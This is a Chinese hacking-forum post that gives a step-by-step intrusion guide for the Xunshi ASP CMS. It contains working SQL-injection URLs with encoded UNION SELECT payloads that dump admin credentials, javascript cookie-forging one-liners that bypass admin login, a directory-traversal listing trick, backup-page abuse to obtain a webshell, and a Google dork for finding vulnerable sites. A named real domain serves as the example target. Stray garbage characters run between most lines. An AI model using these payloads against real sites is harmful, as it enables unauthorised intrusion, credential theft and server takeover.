讯时漏洞总结

admin

by:血封忆尘

在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）
8 Q- Q% r6 \: A/ S6 Q
8 h, Y3 k; \4 ?$ p  X9 G4 V& E以下本文总结来自黑防去年第9期杂志上的内容...

先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
" {- C0 E' c+ t1 s+ A- b4 ^
& i2 l+ z- ~; U9 E26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
& f1 }1 ]) X' ]& m9 {/ l9 l
# i8 m3 O7 n, o6 x$ g记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
这里一个注入
% |, y# O  @) G' E
& J& c. f& K% I0 N0 H% o3 v  t效果如图:
, |! T! k6 b2 v* M- Z7 V6 H' a
; e5 \0 k' T( c6 D) o1 d& P9 F

这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
3 C4 d" n" y, I7 ^( U% }, b
+ }" Z# T5 ]/ @$ D: ]) x7 G& y密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
" }3 F) x* ]6 A; N$ K$ {
3 G9 v. k: q/ D$ ?+ Zjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

  i+ y' j- o0 Z, _- u8 z1 x: M, F那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
4 b8 s5 |7 |: h$ l
; G9 Z4 l5 o* k- L' W2 Y1 \因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
9 e2 S6 e; \: G
7 [# N7 w/ W9 U它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
* e/ l, l( z9 ?+ f. P6 ~  J
6 s" O  }+ ?  I! C4 X4 F- i访问这页面来列目录..步骤如下:
: _  {* \% }# ?: {3 E/ O3 ?& C3 q
# d& Z( Q5 B5 q" [javascript:alert(document.cookie="admindj=1")

5 L2 [+ B6 i/ z2 J9 o& L2 ohttp://www.political-security.co ... asp?id=46&dir=../..
6 V' ?' H/ m# Q/ _
! N9 L" R+ y4 ~) Q% o" N" @6 a效果如图:
3 S; N; n& C. W- k) Y! Q
: V4 R. @! U: l9 O, m

这样全站目录都能瞧了..找到后台目录..进去..

那么进了后台怎么拿shell？？上传--备份就ok了..
+ M7 ~# ?* v0 K0 [* Z
  t) ^0 b5 N  |9 M5 s! N3 ?4 a1 l那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..

这个我也碰到过一次..你都可以通过列目录来实现..

javascript:alert(document.cookie="admindj=1")

9 Q1 [6 d  S: J/ _* l' ~http://www.political-security.co ... p?action=BackupData
! D  j0 f1 |7 X
3 B2 t. F* |$ k9 W+ a# A) b: |4 p+ s备份ok..
& J$ G# |/ J4 G) @$ P5 k7 j
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?

6 P2 z# E$ y& s( d) \在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
" {: L& X/ s( `9 y! e& p
: O0 u0 o3 e, Z9 K9 r然后访问此页面进行注入..步骤如下:

javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
7 Y( D9 ]0 p/ W* r. G
然后请求admin/admin_chk.asp页面

输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
- N/ C8 Q# B# X, @4 B
2 Y) {2 d; J+ R, g26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
1 a9 g/ s3 c; w0 p( |
效果如图所示:


* B$ Z4 ~3 \! ?$ U$ n' ~; b! V1 I% a5 l
讯时漏洞2
: A6 f+ c) t1 H8 F' d  dgoogle关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）

  O- N% U3 s+ ^$ C0 X" c# l1、/admin/admin_news_pl_view.asp?id=1
  t6 i0 S' E- u) B1 }//id任意 填入以下语句
+ `; b" Z: e. V% O5 Y
2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！



8 j, H2 q& n+ x- B, u3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='



爆出管理员帐号和密码了
2 q- S% [7 z2 M8 B


4、cookies进后台
% w$ j0 b5 h* P- O, L; a
  P& U9 ~1 I  t$ }6 djavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
- b  N$ R2 J' e) k  e; y! m  B/ l


5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！

7 u5 r# z, P6 c: S7 U! b2 p
4 g) _: \. C. q0 o9 w* s- d
6、后台有上传和备份取SHELL不难。
! m+ E$ i" [0 b
7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..

3 m3 J% U' o6 L9 B/ ?% U0 q& {: F逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！
8 h/ E$ ^% I1 x3 @" N' b) F
7 `  W2 {" M0 [8 l( k% \
8 Q/ u( u; f. ?0 x